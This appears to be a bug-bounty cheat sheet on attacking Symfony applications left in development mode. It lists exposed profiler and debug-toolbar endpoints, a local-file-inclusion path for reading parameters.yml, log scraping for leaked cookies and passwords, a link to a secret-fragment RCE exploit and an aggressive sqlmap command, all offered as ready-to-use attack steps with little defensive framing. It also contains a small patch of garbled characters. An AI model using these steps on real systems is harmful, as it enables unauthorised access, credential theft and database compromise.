Symfony
Last updated
Last updated
1:- Symfony Open Profiler Description Symfony Profiler is enabled and accessible. It leads to disclosure of sensitive information about the web application Open Profiler endpoint app_dev.php/_profiler/empty/search/results?limit=100
2:-Symfony Web Debug Toolbar Description When Symfony is used in development environment, the web debug toolbar is available at the bottom of all pages. It displays a good summary of the profiling data that gives you instant access to a lot of useful information when something does not work as expected. The web debug toolbar contains sensitive information and should not be present in production systems.
Symfony Web Debug Toolbar Access And Endpoint app_dev.php/_fragment
Bugs you can get
visit all tokens endpoint in app_dev.php/_profiler/empty/search/results?limit=100
by checking all log from tokens links you have a realtime logs and you can find some leaked cookies/user/password
You can also got a LFI on app_dev.php/_profiler/open?file=LFI As example app_dev.php/_profiler/open?file=app/config/parameters.yml
You can also try to find weak app secret and get RCE for more info and scan app secret https://github.com/ambionics/symfony-exploits/blob/main/secret_fragment_exploit.py
You can also try SQL injection in url it鈥檚 self app_dev.php/1[SQL] Sqlmap command sqlmap -u " target[.]com/app_dev.php/1* " --dbms=mysql --threads=8 --leve 5 --risk 3 --random-agent --hostname --current-user --test-filter="MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)" --flush-session --dbs